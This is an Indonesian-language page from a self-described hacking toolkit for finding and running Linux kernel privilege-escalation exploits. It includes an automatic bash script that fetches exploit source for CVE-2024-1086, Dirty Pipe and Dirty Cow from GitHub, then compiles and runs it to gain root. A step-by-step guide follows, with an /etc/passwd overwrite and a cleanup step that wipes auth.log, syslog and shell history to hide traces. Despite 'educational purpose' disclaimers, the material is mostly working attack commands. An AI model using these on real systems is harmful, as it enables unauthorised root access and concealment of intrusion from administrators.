šŸ’€ CVE & EXPLOIT MANAGEMENT

šŸ”„ Complete CVE Database | Exploit Suggester | Auto Downloader

šŸ“¦ CVE Total
50+
šŸ’€ Exploits
25+
šŸ“‹ Modules
5
⚔ Status
READY

šŸ“Š CVE DATABASE

āš ļø Database ini untuk EDUCATIONAL PURPOSE saja!
ā³ Memuat database CVE...

šŸŽÆ CVE EXPLOIT SUGGESTER

āš ļø Suggest exploit berdasarkan kernel version dan OS
šŸ”§ INPUT KERNEL VERSION
Masukkan kernel version untuk mendapatkan rekomendasi exploit
ā³ Masukkan kernel version...

šŸ“„ EXPLOIT DOWNLOADER

āš ļø Download exploit dari berbagai sumber untuk edukasi
šŸ“„ DOWNLOAD EXPLOIT
Pilih CVE untuk mendownload exploit
ā³ Pilih CVE dan klik DOWNLOAD...

šŸ¤– AUTO CVE EXPLOITER

āš ļø PERINGATAN! Hanya untuk testing server sendiri!
šŸ¤– AUTO DETECT & EXPLOIT
Script auto detect kernel dan jalankan exploit yang cocok
#!/bin/bash
# ============================================================
# šŸ¤– AUTO CVE EXPLOITER - DYCAL HACKING TOOLS
# ============================================================
# Auto detect kernel & run matching exploit
# ============================================================

echo "šŸ¤– AUTO CVE EXPLOITER"
echo "========================================="

# Get kernel version
KERNEL=$(uname -r)
echo "[+] Kernel: $KERNEL"

# Check CVE-2024-1086 (5.x - 6.8)
if [[ "$KERNEL" =~ "5.[0-9]" ]] || [[ "$KERNEL" =~ "6.[0-8]" ]]; then
    echo "āš ļø VULNERABLE TO CVE-2024-1086!"
    echo "[+] Downloading exploit..."
    wget -q https://raw.githubusercontent.com/vettrivel007/CVE-2024-1086/main/exploit.c -O /tmp/exp.c
    gcc -o /tmp/exp /tmp/exp.c 2>/dev/null
    /tmp/exp 2>/dev/null
    if [ $(whoami) == "root" ]; then
        echo "āœ… ROOT ACCESS GAINED!"
        exit 0
    fi
fi

# Check Dirty Pipe (5.8 - 5.16)
if [[ "$KERNEL" =~ "5.[8-9]" ]] || [[ "$KERNEL" =~ "5.1[0-6]" ]]; then
    echo "āš ļø VULNERABLE TO DIRTY PIPE!"
    wget -q https://raw.githubusercontent.com/lyx/dirtypipe/main/dirtypipe.c -O /tmp/dp.c
    gcc -o /tmp/dp /tmp/dp.c 2>/dev/null
    /tmp/dp /etc/passwd "root::0:0:root:/root:/bin/bash" 2>/dev/null
    if [ $(whoami) == "root" ]; then
        echo "āœ… ROOT ACCESS GAINED!"
        exit 0
    fi
fi

# Check Dirty Cow (2.6 - 4.8)
if [[ "$KERNEL" =~ "2.[6-9]" ]] || [[ "$KERNEL" =~ "3.[0-9]" ]] || [[ "$KERNEL" =~ "4.[0-8]" ]]; then
    echo "āš ļø VULNERABLE TO DIRTY COW!"
    wget -q https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c -O /tmp/dc.c
    gcc -pthread /tmp/dc.c -o /tmp/dc 2>/dev/null
    /tmp/dc root 2>/dev/null
    if [ $(whoami) == "root" ]; then
        echo "āœ… ROOT ACCESS GAINED!"
        exit 0
    fi
fi

echo "āŒ No matching exploit found."
echo "šŸ’” Run: python3 cve_suggester.py --kernel $KERNEL"
ā³ Ready...

šŸ“‹ STEP BY STEP - CVE & EXPLOIT

āš ļø PERINGATAN! Semua langkah ini hanya untuk EDUCATIONAL PURPOSE!
STEP 1: Cek Kernel Version
Cek kernel version untuk mengetahui CVE yang cocok
uname -r
šŸ’” Tips: Contoh output: 5.14.0-570.25.1.el9_6.x86_64
STEP 2: Scan CVE dengan Suggester
Gunakan CVE Suggester untuk mencari exploit yang cocok
python3 cve_suggester.py --kernel 5.14.0
STEP 3: Download Exploit
Download exploit yang sesuai dari repository
# Download CVE-2024-1086 git clone https://github.com/vettrivel007/CVE-2024-1086 # Download Dirty Pipe wget https://raw.githubusercontent.com/lyx/dirtypipe/main/dirtypipe.c # Download Dirty Cow wget https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c
STEP 4: Compile Exploit
Compile exploit dengan GCC
# Compile CVE-2024-1086 cd CVE-2024-1086 && make # Compile Dirty Pipe gcc -o dirtypipe dirtypipe.c # Compile Dirty Cow gcc -pthread dirty.c -o dirty
STEP 5: Jalankan Exploit
Jalankan exploit untuk mendapatkan root access
# Run CVE-2024-1086 ./exploit # Run Dirty Pipe ./dirtypipe /etc/passwd "root::0:0:root:/root:/bin/bash" # Run Dirty Cow ./dirty root
STEP 6: Verifikasi Root Access
Cek apakah sudah berhasil mendapatkan root
whoami id cat /etc/passwd | grep "root::0"
STEP 7: Cleanup
Bersihkan jejak exploit
# Hapus file exploit rm -rf CVE-2024-1086 dirtypipe dirtypipe.c dirty dirty.c # Clear logs cat /dev/null > /var/log/auth.log cat /dev/null > /var/log/syslog history -c
āœ… SELESAI! Sekarang tuan sudah bisa mengelola CVE dan exploit dengan lengkap! šŸŽÆ